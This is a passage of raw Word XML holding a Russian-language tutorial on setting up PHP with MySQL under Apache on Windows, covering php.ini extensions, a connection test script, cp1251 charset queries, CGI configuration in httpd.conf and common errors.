    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если сервер MySQL уже установлен на Вашей машине, то следующим шагом будет настройка PHP для работы с базами данных MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте на редактирование файл php.ini из каталога Windows. Для подключения библиотеки расширения MySQL Вам нужно убрать символ комментария ;(точка с запятой) из строки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extension=php_mysql.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Также проверьте значение директивы extension_dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>extension_dir =«c:/php-5.0/ext»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Она должна указывать на каталог, где хранятся расширения PHP. Разделители каталогов рекомендуется писать в формате UNIX (/) — обратный слеш. Однако, если ничего не получается, просто откатите назад значение директивы extension_dir, а библиотеку php_mysql.dll скопируйте в корень C:/php-5.0/ - в большинстве случаев это должно помочь.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если PHP Вас подключен как модуль, то Вам также необходимо скопировать библиотеку libmysql.dll из каталога с установленным PHP в системный каталог C:/Windows/System32. Чтобы внесенные изменения вступили в силу — перезагрузите Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для проверки работы MySQL перезапустите сервер Apache и создайте проверочный скрипт со следующим кодом:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php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$dblocation = «127.0.0.1»;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$dbname = «test»;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$dbuser = «root»; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$dbpasswd =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$dbcnx = @mysql_connect($dblocation, $dbuser, $dbpasswd); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if (!$dbcnx) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo «&lt;p&gt;К сожалению, не доступен сервер mySQL&lt;/p&gt;«;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exit();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if (!@mysql_select_db($dbname,$dbcnx) ) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo «&lt;p&gt;К сожалению, не доступна база данных&lt;/p&gt;«;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exit();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$ver = mysql_query(«SELECT VERSION()»); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if(!$ver) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">echo «&lt;p&gt;Ошибка в запросе&lt;/p&gt;«;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exit();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echo mysql_result($ver, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В случае успешной интеграции MySQL в связку Apache и PHP, обращение к проверочному скрипту выведет в окно браузера версию сервера MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В новых версиях MySQL (начиная с 4.1.0) изменился порядок работы с национальными кодировками, поэтому старый код может вызывать появление в таблице базы данных знаков вопроса '????????' вместо русского текста. Для того, чтобы этого не возникало в начало PHP-скрипта, после установки соединения с базой данных, следует поместить следующие строки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php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mysql_query («set character_set_client='cp1251'«);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mysql_query («set character_set_results='cp1251'«);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mysql_query («set collation_connection='cp1251_general_ci'«); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На последок вам возможно понадобится настроить некоторые расширения PHP, они настраиваются точно так же как и MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так для того, чтобы подключить графическую библиотеку GDLib в php.ini необходимо раскомментировать строку:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extension=php_gd2.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверьте после этого наличие данной библиотеки в папке c:phpext. После внесения изменений в php.ini перезапустите сервер. Что бы быстро проверить: подключилась ли библиотека — выполните функцию phpinfo(). Если все в порядке, то в таблице, которая отображается функций phpinfo(), должен появится раздел «gd».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Некоторые расширения требуют дополнительных библиотек. Так для того чтобы воспользоваться расширением PHP «Mcrypt Encryption», позволяющем осуществлять симметричное шифрование необходимо, во первых, расскомментирования строку в php.ini</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extension=php_mcrypt.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>А во вторых скопировать в папку С:/WINDOWS/ дополнительную библиотеку libmcrypt.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не подключается MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTML-файлы выполняются, а PHP-скрипты нет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Файл httpd.conf. Подключение PHP как CGI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ошибка</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal Server Error </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>подключении</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Типичные вопросы и ошибки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверьте, нет ли у Вас ошибок при подключении PHP в httpd.conf.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AddType application/x-httpd-php phtml php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&lt;Directory «c:/php»&gt;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Options ExecCGI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&lt;/Directory&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ScriptAlias «/php_dir/» «c:/php/» </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Action application/x-httpd-php «/php_dir/php-cgi.exe»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Особое внимание обратите на имя подключаемого модуля: php-cgi.exe. Для применения изменений, вносимых в файл httpd.conf, Apache следует перезагрузить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При использовании устаревшего имени php.exe, использовавшегося в более ранних версиях вместо php-cgi.exe также возможно появлении ошибки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>403 Forbidden You don't have permission to access /__php_dir__/php.exe/test.php on this server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При ненастроенном подключении PHP при обращении к файлам с расширением php, например: http:/localohost/index.php открывается окно с запрос на загрузку такого файла. Это говорит о том, что не настроена обработка файлов с расширением php. Проверьте в файле httpd.conf существование следующей строки:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AddType application/x-httpd-php phtml php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Notice: Undefined variable...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На новом, только что установленном, PHP можно часто видеть сообщения вида:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
